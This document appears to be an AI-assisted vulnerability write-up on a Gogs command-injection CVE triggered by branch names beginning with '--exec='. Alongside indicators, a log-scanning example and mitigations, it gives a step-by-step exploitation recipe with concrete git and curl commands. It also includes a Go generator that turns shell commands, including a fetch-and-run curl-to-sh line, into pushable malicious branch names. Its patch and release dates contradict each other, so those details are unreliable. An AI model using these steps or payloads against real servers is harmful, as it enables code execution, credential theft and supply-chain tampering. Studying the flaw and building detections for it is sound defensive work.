CVE-2026-52806
Vulnerability analysis and mitigation

Overview

CVE-2026-52806 is a critical remote code execution (RCE) vulnerability in Gogs, the self-hosted Git service, caused by argument injection through a crafted branch name during pull request rebase merges. An authenticated attacker who names a branch --exec=<payload> can smuggle git's --exec flag into the git rebase command that Gogs runs, so that arbitrary OS commands execute as the Gogs process user. The vulnerability affects Gogs versions prior to 0.14.3, including the latest stable release 0.14.2 and development commit b53d3162. It was discovered by Jonah Burgess (CryptoCat) of Rapid7, published on June 19, 2026, and patched on June 23, 2026. It carries a CVSS v3.1 base score of 9.9 (Critical) (GitHub Advisory, Gogs Advisory).

Technical details

The root cause is CWE-77 (Command Injection): in internal/database/pull.go, the Merge() function passes pr.BaseBranch directly to git rebase through process.ExecDir without a -- (or --end-of-options) separator, so a branch name beginning with -- is parsed by git as a flag rather than as a ref. pr.BaseBranch originates from a URL parameter and is validated only with git rev-parse --verify, which confirms that the ref resolves to an object, not that the name is safe to pass as an argument; because the attacker pushes the malicious branch themselves, that check passes. Git's --exec flag makes git rebase run a shell command via sh -c after each replayed commit. Git refs cannot contain spaces, so the payload uses ${IFS} (the shell's default word separator) wherever a space is needed. For payloads that need characters git refuses in a ref name (for example : or ~), the attacker base64-encodes the command and wraps it as --exec=echo${IFS}<base64>|base64${IFS}-d|sh; the pipe character itself is permitted in ref names, which is why that wrapper can be pushed. Merge() sidesteps the hardened git-module library (v1.8.7) because it uses raw process.ExecDir instead of the library's safe API, and the git rebase call was never migrated to use --end-of-options (GitHub Advisory, Fix Commit).

Impact

Successful exploitation grants the attacker arbitrary OS command execution as the Gogs process user (typically git), constituting a full privilege escalation from authenticated user to server-level access. On multi-tenant instances, this enables cross-tenant data breaches (reading all repositories including private ones), credential theft (database access to password hashes, API tokens, SSH keys, and 2FA secrets for all users), supply chain attacks (silent modification of any hosted repository's code), and lateral movement to other systems reachable from the server's network. Because Gogs ships with open registration enabled by default (DISABLE_REGISTRATION = false) and any user who creates a repository is automatically its admin, the effective attack surface extends to unauthenticated network attackers on default-configured instances (GitHub Advisory, Gogs Advisory).

Exploitation steps

  1. Reconnaissance: Identify internet-facing Gogs instances running versions prior to 0.14.3 using Shodan, Censys, or by fingerprinting the version string Gogs exposes. Confirm that open registration is enabled (the default).
  2. Account creation: Register an account on the target instance (or use existing credentials); self-registration is enabled on default installs.
  3. Repository setup: Create a new repository via the Gogs API or web UI, e.g.: curl -s -u attacker:Password123 -X POST http://target:3000/api/v1/user/repos -H 'Content-Type: application/json' -d '{"name":"demo"}'
  4. Enable rebase merge: Navigate to the repository's Settings > Advanced and enable "Allow rebase" (or use the API). Any repo owner/admin can do this without site-admin intervention.
  5. Create malicious branch: Locally, create a branch whose name injects the --exec flag: git update-ref 'refs/heads/--exec=touch${IFS}/tmp/rce_proof' HEAD. git update-ref is used rather than git branch or git checkout -b because those refuse branch names that begin with -, whereas update-ref only enforces the ref-format rules. For complex payloads (e.g., reverse shells), base64-encode the command: --exec=echo${IFS}<base64_payload>|base64${IFS}-d|sh
  6. Push branches: Push the malicious base branch and a normal feature branch to the remote, spelling out the full refspec so the branch name is not parsed as an option: git push origin master feature 'refs/heads/--exec=touch${IFS}/tmp/rce_proof:refs/heads/--exec=touch${IFS}/tmp/rce_proof'
  7. Create pull request: Open a PR with the malicious branch as the base and the feature branch as the head via the compare URL (URL-encode the branch name).
  8. Wait for mergeability: Wait ~5 seconds for the background TestPullRequests goroutine to mark the PR as mergeable (exploiting the race condition in testPatch()).
  9. Trigger rebase merge: On the PR page, select "Rebase before merging" and click "Merge Pull Request". The server executes git rebase --quiet '--exec=<payload>' 'head_repo/feature', which runs the payload through sh -c after each replayed commit. The subsequent git checkout of the same branch name fails and the server returns HTTP 500 (expected), but the payload has already executed.
  10. Verify/escalate: Confirm code execution (e.g., check for the created file or a reverse shell connection). Use the Gogs process user's filesystem access to read all repositories or the database, or pivot further (GitHub Advisory, Gogs Advisory).
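To make the ref-name constraints behind steps 5 and 6 concrete, the following is an added example in Go; it is neither Gogs code nor the Rapid7 PoC. It builds the --exec branch name for a given shell command, substitutes ${IFS} for spaces, falls back to the base64 wrapper from step 5 when the command contains characters a ref cannot hold, and checks the result against a model of git check-ref-format (refNameOK is this example's own approximation, not git's code). The two sample commands and the host 10.0.0.1 are constructed inputs.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"strings"
)

// refUnsafe holds the printable characters git check-ref-format rejects
// anywhere in a ref name. Space is among them, which is why the payload
// uses ${IFS} instead; '|', '$', '{', '}' and '=' are all permitted.
const refUnsafe = " ~^:?*[\\"

// refNameOK models git check-ref-format for a branch name (the part after
// refs/heads/). It is an approximation written for this example, not git's
// code. Like git update-ref it does not reject a leading '-'; only git branch
// and git checkout -b add that check, which is why the exploit uses update-ref.
func refNameOK(name string) bool {
	if name == "" || name == "@" || strings.HasPrefix(name, "/") || strings.HasSuffix(name, "/") {
		return false
	}
	if strings.Contains(name, "..") || strings.Contains(name, "@{") || strings.Contains(name, "//") {
		return false
	}
	for _, component := range strings.Split(name, "/") {
		if strings.HasPrefix(component, ".") || strings.HasSuffix(component, ".") || strings.HasSuffix(component, ".lock") {
			return false
		}
	}
	for _, r := range name {
		if r < 0x20 || r == 0x7f || strings.ContainsRune(refUnsafe, r) {
			return false
		}
	}
	return true
}

// execRef builds the branch name that git rebase will parse as --exec=<cmd>.
// Spaces become ${IFS}. If the command still contains characters a ref cannot
// hold, it is base64-wrapped into the echo|base64 -d|sh form from step 5.
// encoded reports which form was used; an error means no ref-safe form exists.
func execRef(cmd string) (ref string, encoded bool, err error) {
	direct := "--exec=" + strings.ReplaceAll(cmd, " ", "${IFS}")
	if refNameOK(direct) {
		return direct, false, nil
	}
	b64 := base64.StdEncoding.EncodeToString([]byte(cmd))
	wrapped := "--exec=echo${IFS}" + b64 + "|base64${IFS}-d|sh"
	if !refNameOK(wrapped) {
		// base64 output can contain "//" (e.g. from runs of 0xff bytes), which a ref rejects
		return "", false, fmt.Errorf("no ref-safe encoding for %q", cmd)
	}
	return wrapped, true, nil
}

// pushRefspec is the explicit src:dst refspec from step 6; the full ref path
// is spelled out so git push does not treat the branch name as an option.
func pushRefspec(ref string) string {
	return "refs/heads/" + ref + ":refs/heads/" + ref
}

func main() {
	for _, cmd := range []string{
		"touch /tmp/rce_proof",                // fits directly: only spaces need ${IFS}
		"curl -s http://10.0.0.1:8080/p | sh", // contains ':' so it must be base64-wrapped
	} {
		ref, encoded, err := execRef(cmd)
		if err != nil {
			fmt.Println("error:", err)
			continue
		}
		fmt.Printf("command: %s\nencoded: %v\nbranch:  %s\nrefspec: %s\n\n",
			cmd, encoded, ref, pushRefspec(ref))
	}
}
```

The first command reproduces the branch name from step 5 unchanged; the second is rejected in its direct form because of the colon and is emitted in the echo|base64 -d|sh wrapper, which is itself a valid ref because base64 output and the pipe character are permitted.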

Indicators of compromise

  • Logs: Gogs error-log entries at ERROR level matching the pattern: [E] ...merge: git checkout '--exec=<...>': exit status 128 - error: unknown option 'exec=<...>' — this is the signature left by the git checkout step that runs after the rebase and fails, by which point the payload has already executed.
  • Logs: HTTP 500 responses to PR merge endpoints (e.g., POST /<user>/<repo>/pulls/<id>/merge) with Rebase before merging selected, especially from newly created repositories.
  • File System: Unexpected files created in /tmp/ or other world-writable directories by the git process user (e.g., /tmp/rce_proof, /tmp/BROWSER_RCE_PROOF).
  • File System: New scripts, cron jobs, or SSH authorized_keys modifications owned by the Gogs process user (git, UID 1000 in Docker).
  • Network: Unexpected outbound connections (e.g., reverse shells, wget/curl to external hosts) originating from the Gogs server process.
  • Process: Unusual child processes spawned by the Gogs process (e.g., sh, bash, curl, wget, nc) with command-line arguments containing base64-encoded strings or ${IFS} patterns.
  • Repository: Presence of a branch in any repository whose name begins with - (in particular --exec=) or otherwise looks like a git flag; on the server, git for-each-ref refs/heads run inside each bare repository lists them (GitHub Advisory, Gogs Advisory).
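The log indicator above can be turned into a small triage routine. The following is an added Go example (not Gogs code and not from the advisory) that scans log lines for the merge/git-checkout signature, generalises it to any git subcommand that received a dash-prefixed argument, and recovers the shell command the attacker intended by reversing the ${IFS} substitution and the base64 wrapper. The sample lines are constructed for this example: the merge/git checkout fragment follows the signature quoted above, while the timestamp and level prefix is an assumption about log layout.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
	"strings"
)

// sampleLog is constructed for this example, not captured from a real Gogs
// instance. Lines 2 and 4 carry the failed-checkout signature; line 3 is a
// benign checkout failure that must not be flagged.
var sampleLog = []string{
	`2026/06/20 10:01:02 [ INFO] Listen: http://0.0.0.0:3000`,
	`2026/06/20 10:03:17 [ERROR] merge: git checkout '--exec=touch${IFS}/tmp/rce_proof': exit status 128 - error: unknown option 'exec=touch${IFS}/tmp/rce_proof'`,
	`2026/06/20 10:04:02 [ERROR] merge: git checkout 'feature': exit status 128 - error: pathspec 'feature' did not match any file(s) known to git`,
	`2026/06/20 10:05:44 [ERROR] merge: git checkout '--exec=echo${IFS}aWQgPiAvdG1wL291dA==|base64${IFS}-d|sh': exit status 128 - error: unknown option 'exec=echo${IFS}aWQgPiAvdG1wL291dA==|base64${IFS}-d|sh'`,
}

// dashArg matches any git subcommand inside a merge error whose quoted
// argument starts with '-'. It is broader than the --exec signature so that
// other injected flags in the same code path are caught as well.
var dashArg = regexp.MustCompile(`merge: git (\w+) '(-[^']*)'`)

// b64Wrapper matches the echo <base64>|base64 -d|sh form once ${IFS} has
// been turned back into spaces.
var b64Wrapper = regexp.MustCompile(`^echo ([A-Za-z0-9+/=]+)\|base64 -d\|sh$`)

// Finding is one flagged log line.
type Finding struct {
	Line    int    // 1-based index into the log
	GitCmd  string // git subcommand that logged the failure
	Arg     string // injected argument exactly as it appeared in the ref name
	Payload string // shell command the attacker intended, decoded if wrapped
}

// decodePayload recovers the shell command from an injected --exec argument.
// Arguments that are not --exec flags are returned unchanged.
func decodePayload(arg string) string {
	if !strings.HasPrefix(arg, "--exec=") {
		return arg
	}
	cmd := strings.ReplaceAll(strings.TrimPrefix(arg, "--exec="), "${IFS}", " ")
	if m := b64Wrapper.FindStringSubmatch(cmd); m != nil {
		if raw, err := base64.StdEncoding.DecodeString(m[1]); err == nil {
			return string(raw)
		}
	}
	return cmd
}

// scanLog returns one Finding per line carrying a dash-prefixed git argument.
func scanLog(lines []string) []Finding {
	var out []Finding
	for i, line := range lines {
		m := dashArg.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		out = append(out, Finding{Line: i + 1, GitCmd: m[1], Arg: m[2], Payload: decodePayload(m[2])})
	}
	return out
}

func main() {
	for _, f := range scanLog(sampleLog) {
		fmt.Printf("line %d: git %s received %q -> payload %q\n", f.Line, f.GitCmd, f.Arg, f.Payload)
	}
}
```

Run against the constructed sample, the scanner flags lines 2 and 4 and skips the benign checkout failure on line 3; the base64-wrapped entry is decoded back to the attacker's command so the analyst sees what actually ran rather than the opaque ref name.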

Mitigation and workarounds

Upgrade Gogs to version 0.14.3, which adds --end-of-options to the git rebase, git checkout, git merge, and git push invocations in Merge(), and rejects branch names starting with - at the Merge() entry point (Gogs Release, Fix Commit). If an immediate upgrade is not possible, disable self-registration (DISABLE_REGISTRATION = true in the [service] section of app.ini) to prevent unauthenticated account creation, and disable the "Rebase before merging" option on all repositories. Additionally, restrict network access to the Gogs instance to trusted users only, and run the Gogs process with the minimum necessary OS privileges to limit the blast radius of exploitation.
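To show why the missing separator described under Technical details is exploitable and why the two fixes listed above close it, the following is an added Go example; it is not code from Gogs or from the fix commit. rebaseArgsVulnerable and rebaseArgsFixed reproduce only the argument shape the write-up describes for Merge() before and after 0.14.3, and parseGitStyle is a deliberately small model of git's parse-options rule for "--" and "--end-of-options", not git's parser. The branch names are the ones from the exploitation steps.

```go
package main

import (
	"fmt"
	"strings"
)

// rebaseArgsVulnerable has the argument shape the write-up attributes to
// Merge() before 0.14.3: the user-controlled base branch lands where git is
// still reading options.
func rebaseArgsVulnerable(base, head string) []string {
	return []string{"rebase", "--quiet", base, head}
}

// rebaseArgsFixed applies both defences attributed to 0.14.3: an up-front
// rejection of names starting with '-' and --end-of-options ahead of every
// user-controlled value. Either alone stops this payload; keeping both means a
// call site that later forgets the separator is still protected by the check.
func rebaseArgsFixed(base, head string) ([]string, error) {
	for _, name := range []string{base, head} {
		if strings.HasPrefix(name, "-") {
			return nil, fmt.Errorf("refusing branch name that starts with '-': %q", name)
		}
	}
	return []string{"rebase", "--quiet", "--end-of-options", base, head}, nil
}

// parseGitStyle models the one parse-options rule that matters here (it is not
// git's parser): an argument beginning with '-' is an option until "--" or
// "--end-of-options" is seen, after which everything is an operand. It returns
// the --exec value git would hand to `sh -c`, plus the operands.
func parseGitStyle(args []string) (execCmd string, operands []string) {
	optionsDone := false
	for _, a := range args[1:] { // args[0] is the subcommand
		switch {
		case optionsDone || !strings.HasPrefix(a, "-"):
			operands = append(operands, a)
		case a == "--" || a == "--end-of-options":
			optionsDone = true
		case strings.HasPrefix(a, "--exec="):
			execCmd = strings.TrimPrefix(a, "--exec=")
		default:
			// other options such as --quiet carry no payload in this model
		}
	}
	return execCmd, operands
}

func main() {
	base := "--exec=touch${IFS}/tmp/rce_proof" // the branch name from the exploitation steps
	head := "head_repo/feature"

	execCmd, operands := parseGitStyle(rebaseArgsVulnerable(base, head))
	fmt.Printf("vulnerable: sh -c %q would run after each commit; operands %v\n", execCmd, operands)

	if _, err := rebaseArgsFixed(base, head); err != nil {
		fmt.Println("fixed:     ", err)
	}
	args, _ := rebaseArgsFixed("master", head)
	execCmd, operands = parseGitStyle(args)
	fmt.Printf("fixed:      exec=%q operands %v\n", execCmd, operands)
}
```

In the vulnerable shape the crafted base name is consumed as the --exec option and only head_repo/feature survives as an operand, which is exactly the command line quoted in step 9. With --end-of-options in front of the user-controlled values the same name would be treated as an operand and fail as a non-existent ref; the leading-dash check refuses it before git is even invoked.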

Community reactions

The vulnerability was discovered and reported by Jonah Burgess (CryptoCat), Senior Security Researcher at Rapid7, who published a detailed technical blog post and a standalone Python PoC exploit (Rapid7 Blog). The advisory notes that this is part of a recurring pattern of argument injection vulnerabilities in Gogs, and that it bypasses the incomplete protections added in response to prior CVEs (CVE-2024-39933, CVE-2024-39932, CVE-2024-39930). The fix was merged promptly by Gogs maintainer unknwon on June 6, 2026, and released in v0.14.3 on June 7, 2026 (Fix PR). CTI aggregators such as CTI Pilot covered the vulnerability in their weekly briefs.

Additional resources


Source: this report was generated with the help of AI.
